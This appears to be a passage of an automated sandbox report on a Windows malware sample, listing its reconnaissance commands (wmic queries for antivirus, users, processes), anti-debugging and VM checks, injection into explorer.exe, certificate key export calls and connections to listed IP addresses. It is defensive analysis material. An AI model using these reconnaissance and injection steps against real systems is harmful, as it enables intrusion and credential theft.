    Source: C:\Users\user\AppData\Local\Temp\B972.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | API/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | API/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\jghruer | API/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\jghruer | API/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | API/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | API/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\hdhruer | API/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\hdhruer | API/Special instruction interceptor: Address: 7FFE2220D584
    Source: hdhruer, 00000008.00000002.2573378504.000000000048E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKS=KR
    Source: jghruer, 00000005.00000002.1976948606.000000000056E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK(?
    Source: ctMI3TYXpX.exe, 00000000.00000002.1726195283.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 35DB.exe, 00000006.00000002.2327390421.000000000075E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 16_2_00141016
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 371
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1321
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 674
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1898
    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 883
    Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 868
    Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 3124
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2600
    Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 4547
    Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 4440
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_9-4486
    Source: C:\Windows\explorer.exe TID: 7440 | Thread sleep count: 371 > 30
    Source: C:\Windows\explorer.exe TID: 7448 | Thread sleep count: 1321 > 30
    Source: C:\Windows\explorer.exe TID: 7448 | Thread sleep time: -132100s >= -30000s
    Source: C:\Windows\explorer.exe TID: 7444 | Thread sleep count: 674 > 30
    Source: C:\Windows\explorer.exe TID: 7444 | Thread sleep time: -67400s >= -30000s
    Source: C:\Windows\explorer.exe TID: 7792 | Thread sleep count: 286 > 30
    Source: C:\Windows\explorer.exe TID: 7800 | Thread sleep count: 266 > 30
    Source: C:\Windows\explorer.exe TID: 7796 | Thread sleep count: 287 > 30
    Source: C:\Windows\explorer.exe TID: 8000 | Thread sleep count: 48 > 30
    Source: C:\Windows\explorer.exe TID: 7448 | Thread sleep count: 1898 > 30
    Source: C:\Windows\explorer.exe TID: 7448 | Thread sleep time: -189800s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 5100 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6104 | Thread sleep count: 3124 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6104 | Thread sleep time: -3124000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 5004 | Thread sleep count: 2600 > 30
    Source: C:\Windows\explorer.exe TID: 5004 | Thread sleep time: -2600000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3264 | Thread sleep count: 4547 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3264 | Thread sleep time: -4547000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2132 | Thread sleep count: 4440 > 30
    Source: C:\Windows\explorer.exe TID: 2132 | Thread sleep time: -4440000s >= -30000s
    Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\explorer.exe | Last function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6FB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose, 9_2_00007FF6F2D6FB38
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02752B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 13_2_02752B15
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02753ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 13_2_02753ED9
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02751D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 13_2_02751D4A
    Source: C:\Windows\explorer.exe | Code function: 15_2_00CD30A8 FindFirstFileW,FindNextFileW,FindClose, 15_2_00CD30A8
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02756512 GetSystemInfo, 13_2_02756512
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
    Source: explorer.exe, 00000001.00000000.1714740559.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1714740559.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 00000001.00000000.1714740559.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
    Source: B972.exe, 00000009.00000002.4124068807.000002342E58C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *Hyper-V Administrators
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: B972.exe, 00000009.00000002.4124955821.000002342E63B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lgroup & echo 3357828121311360313357828121\r\n\r\nAliases for \\\\user-PC\r\n\r\n-------------------------------------------------------------------------------\r\n*Access Control Assistance Operators\r\n*Administrators\r\n*Backup Operators\r\n*Cryptographic Operators\r\n*Device Owners\r\n*Distributed COM Users\r\n*Event Log Readers\r\n*Guests\r\n*Hyper-V Administrators\r\n*IIS_IUSRS\r\n*Network Configuration Operators\r\n*Performance Log Users\r\n*Performance Monitor Users\r\n*Power Users\r\n*Remote Desktop Users\r\n*Remote Management Users\r\n*Replicator\r\n*System Managed Accounts Group\r\n*Users\r\nThe command completed successfully.\r\n\r\n3357828121311360313357828121\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>\r\nC:\\Users\\user\\AppData\\Local\\Temp>
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: TULH3 5DEYV, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'850 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'113 MB\r\nVirtual Memory: In Use: 1'078 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: UPf6A\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n2933921759311360312933921759\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>uthority","subje
    Source: explorer.exe, 00000001.00000000.1714740559.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: ROUTE.EXE, 00000022.00000002.3112493340.0000022FEDB39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe System information queried: CodeIntegrityInformation
    Source: C:\Users\user\AppData\Roaming\jghruer System information queried: CodeIntegrityInformation
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe System information queried: CodeIntegrityInformation
    Source: C:\Users\user\AppData\Roaming\hdhruer System information queried: CodeIntegrityInformation
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Process queried: DebugPort
    Source: C:\Users\user\AppData\Roaming\jghruer Process queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Process queried: DebugPort
    Source: C:\Users\user\AppData\Roaming\hdhruer Process queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Code function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00141B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock, 16_2_00141B17
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 16_2_00141016
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Code function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx, 9_2_00007FF6F2D63220
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Code function: 0_2_004B092B mov eax, dword ptr fs:[00000030h] 0_2_004B092B
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Code function: 0_2_004B0D90 mov eax, dword ptr fs:[00000030h] 0_2_004B0D90
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Code function: 0_2_005031F6 push dword ptr fs:[00000030h] 0_2_005031F6
    Source: C:\Users\user\AppData\Roaming\jghruer Code function: 5_2_0053092B mov eax, dword ptr fs:[00000030h] 5_2_0053092B
    Source: C:\Users\user\AppData\Roaming\jghruer Code function: 5_2_00530D90 mov eax, dword ptr fs:[00000030h] 5_2_00530D90
    Source: C:\Users\user\AppData\Roaming\jghruer Code function: 5_2_00592E16 push dword ptr fs:[00000030h] 5_2_00592E16
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Code function: 6_2_005B092B mov eax, dword ptr fs:[00000030h] 6_2_005B092B
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Code function: 6_2_005B0D90 mov eax, dword ptr fs:[00000030h] 6_2_005B0D90
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Code function: 6_2_00783242 push dword ptr fs:[00000030h] 6_2_00783242
    Source: C:\Users\user\AppData\Roaming\hdhruer Code function: 8_2_004B1C7A push dword ptr fs:[00000030h] 8_2_004B1C7A
    Source: C:\Users\user\AppData\Roaming\hdhruer Code function: 8_2_01FA0D90 mov eax, dword ptr fs:[00000030h] 8_2_01FA0D90
    Source: C:\Users\user\AppData\Roaming\hdhruer Code function: 8_2_01FA092B mov eax, dword ptr fs:[00000030h] 8_2_01FA092B
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Code function: 9_2_00007FF6F2D625B4 GetProcessHeap,RtlFreeHeap, 9_2_00007FF6F2D625B4

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\explorer.exe File created: 35DB.exe.1.dr
    Source: C:\Windows\explorer.exe Network Connect: 201.103.8.135 80
    Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 23.145.40.168 443
    Source: C:\Windows\explorer.exe Network Connect: 180.75.11.133 80
    Source: C:\Windows\explorer.exe Network Connect: 23.145.40.164 443
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Thread created: C:\Windows\explorer.exe EIP: 33C19A8
    Source: C:\Users\user\AppData\Roaming\jghruer Thread created: unknown EIP: 8C419A8
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Thread created: unknown EIP: 8801970
    Source: C:\Users\user\AppData\Roaming\hdhruer Thread created: unknown EIP: 9071970
    Source: C:\Windows\explorer.exe Memory written: PID: 6796 base: 2379C0 value: 90
    Source: C:\Windows\explorer.exe Memory written: PID: 7496 base: 7FF72B812D10 value: 90
    Source: C:\Windows\explorer.exe Memory written: PID: 5804 base: 2379C0 value: 90
    Source: C:\Windows\explorer.exe Memory written: PID: 7524 base: 7FF72B812D10 value: 90
    Source: C:\Windows\explorer.exe Memory written: PID: 5088 base: 2379C0 value: 90
    Source: C:\Windows\explorer.exe Memory written: PID: 4092 base: 7FF72B812D10 value: 90
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Users\user\AppData\Roaming\jghruer Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\AppData\Roaming\jghruer Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Users\user\AppData\Roaming\hdhruer Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\AppData\Roaming\hdhruer Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0
    Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0
    Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0
    Source: C:\Windows\SysWOW64\explorer.exe Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 19_2_02EF10A5
    Source: C:\Windows\SysWOW64\explorer.exe Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 19_2_02EF1016
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Process created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net share
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
    Source: C:\Windows\System32\net.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1712382332.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
